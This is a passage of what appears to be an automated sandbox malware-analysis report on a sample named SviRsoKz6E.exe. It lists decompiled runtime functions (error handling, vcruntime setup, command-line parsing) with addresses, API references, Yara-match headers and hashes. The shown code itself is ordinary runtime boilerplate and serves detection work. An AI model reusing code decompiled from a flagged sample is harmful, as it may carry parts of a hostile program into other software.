							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                  0x00404320
                  0x00404320
                  0x00404320
                  0x0040432a
                  0x0040432c
                  0x00404331
                  0x00404334
                  0x00404342
                  0x00404349
                  0x0040434e
                  0x00404351
                  0x00404354
                  0x00404366
                  0x0040436b
                  0x0040436d
                  0x00404378
                  0x0040437f
                  0x00404384
                  0x00404387
                  0x00404389
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040436f
                  0x0040436f
                  0x00000000
                  0x0040436f
                  0x00404356
                  0x00404356
                  0x00404357
                  0x00404357
                  0x0040435c
                  0x00404397
                  0x00404398
                  0x0040439e
                  0x004043a3
                  0x004043a6
                  0x004043a7
                  0x004043a8
                  0x004043af
                  0x004043b1
                  0x004043b3
                  0x004043b8
                  0x004043bb
                  0x004043c9
                  0x004043d5
                  0x004043d8
                  0x004043db
                  0x004043ed
                  0x004043f2
                  0x004043f4
                  0x004043ff
                  0x00404405
                  0x0040440d
                  0x0040440f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004043f6
                  0x004043f6
                  0x00000000
                  0x004043f6
                  0x004043dd
                  0x004043dd
                  0x004043de
                  0x004043de
                  0x00404411
                  0x00404412
                  0x00404412
                  0x004043bd
                  0x004043c3
                  0x004043c7
                  0x0040441a
                  0x0040441b
                  0x00404421
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004043c7
                  0x00404428
                  0x00404428
                  0x00404336
                  0x0040433c
                  0x00404340
                  0x0040438b
                  0x0040438c
                  0x00404396
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404340

                  APIs
                  • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                  • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                  • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                  • _abort.LIBCMT ref: 0040439E
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$_abort
                  • String ID:
                  • API String ID: 88804580-0
                  • Opcode ID: 54e47db35c0448b4cf7e2db8d8e74e5280bc3c3a2787311eea3a859c1692b79f
                  • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                  • Opcode Fuzzy Hash: 54e47db35c0448b4cf7e2db8d8e74e5280bc3c3a2787311eea3a859c1692b79f
                  • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                  0x004025ba
                  0x004025bf
                  0x004025cb
                  0x004025d0
                  0x004025d5
                  0x004025d7
                  0x004025e2
                  0x004025d9
                  0x004025d9
                  0x00000000
                  0x004025d9
                  0x004025cd
                  0x004025cd
                  0x004025cf
                  0x004025cf

                  APIs
                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                    • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                  • String ID:
                  • API String ID: 1761009282-0
                  • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                  • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                  • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                  • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402E79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                  Download Yara Rule
                  C-Code - Quality: 87%
                  			E00402E79(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				WCHAR* _t48;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t53;
				intOrPtr* _t56;
				struct HINSTANCE__* _t61;
				intOrPtr _t62;

				if(_a4 == 2 || _a4 == 1) {
					GetModuleFileNameW(0, 0x412bf8, 0x104);
					_t48 =  *0x412e7c; // 0x611c30
					 *0x412e80 = 0x412bf8;
					if(_t48 == 0 ||  *_t48 == 0) {
						_t48 = 0x412bf8;
					}
					_v8 = 0;
					_v16 = 0;
					E00402F98(_t48, 0, 0,  &_v8,  &_v16);
					_t61 = E0040311E(_v8, _v16, 2);
					if(_t61 != 0) {
						E00402F98(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t49 = E00404D5E(_t61);
							if(_t49 == 0) {
								_t56 = _v12;
								_t53 = 0;
								_t35 = _t56;
								if( *_t56 == 0) {
									L15:
									_t36 = 0;
									 *0x412e6c = _t53;
									_v12 = 0;
									_t49 = 0;
									 *0x412e74 = _t56;
									L16:
									E00403E03(_t36);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t35 = _t35 + 4;
									_t53 =  &(_t53->i);
								} while ( *_t35 != 0);
								goto L15;
							}
							_t36 = _v12;
							goto L16;
						}
						 *0x412e6c = _v8 - 1;
						_t42 = _t61;
						_t61 = 0;
						 *0x412e74 = _t42;
						goto L10;
					} else {
						_t43 = E00404831();
						_push(0xc);
						_pop(0);
						 *_t43 = 0;
						L10:
						_t49 = 0;
						L17:
						E00403E03(_t61);
						return _t49;
					}
				} else {
					_t44 = E00404831();
					_t62 = 0x16;
					 *_t44 = _t62;
					E00404639();
					return _t62;
				}
			}

















                  0x00402e86
                  0x00402eb4
                  0x00402eba
                  0x00402ec0
                  0x00402ec8
                  0x00402ecf
                  0x00402ecf
                  0x00402ed4
                  0x00402edb
                  0x00402ee2
                  0x00402ef4
                  0x00402efb
                  0x00402f1a
                  0x00402f26
                  0x00402f41
                  0x00402f44
                  0x00402f4b
                  0x00402f51
                  0x00402f58
                  0x00402f5b
                  0x00402f5d
                  0x00402f61
                  0x00402f6b
                  0x00402f6b
                  0x00402f6d
                  0x00402f73
                  0x00402f76
                  0x00402f78
                  0x00402f7e
                  0x00402f7f
                  0x00402f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402f63
                  0x00402f63
                  0x00402f63
                  0x00402f66
                  0x00402f67
                  0x00000000
                  0x00402f63
                  0x00402f53
                  0x00000000
                  0x00402f53
                  0x00402f2c
                  0x00402f31
                  0x00402f33
                  0x00402f35
                  0x00000000
                  0x00402efd
                  0x00402efd
                  0x00402f02
                  0x00402f04
                  0x00402f05
                  0x00402f3a
                  0x00402f3a
                  0x00402f88
                  0x00402f89
                  0x00000000
                  0x00402f92
                  0x00402e8e
                  0x00402e8e
                  0x00402e95
                  0x00402e96
                  0x00402e98
                  0x00000000
                  0x00402e9d

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SviRsoKz6E.exe,00000104), ref: 00402EB4
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: FileModuleName
                  • String ID: C:\Users\user\Desktop\SviRsoKz6E.exe$?a
                  • API String ID: 514040917-298043369
                  • Opcode ID: 2cfacd389ea40efee126ce9319d6380826f7730147447c1be045c906c01c030b
                  • Instruction ID: f3d78f03607b51ffb72bb6c03706454bab976d361db7ab759f67f4c6569d847e
                  • Opcode Fuzzy Hash: 2cfacd389ea40efee126ce9319d6380826f7730147447c1be045c906c01c030b
                  • Instruction Fuzzy Hash: 9631C471A00219AFCB21DF99DA8899FBBBCEF84744B10407BF804A72C0D6F44E41DB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405575, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405575() {

				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}



                  0x0040557b
                  0x00405586
                  0x0040558d

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: CommandLine
                  • String ID: `3a
                  • API String ID: 3253501508-2034771660
                  • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                  • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
                  • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                  • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
                  Uniqueness

                  Uniqueness Score: -1.00%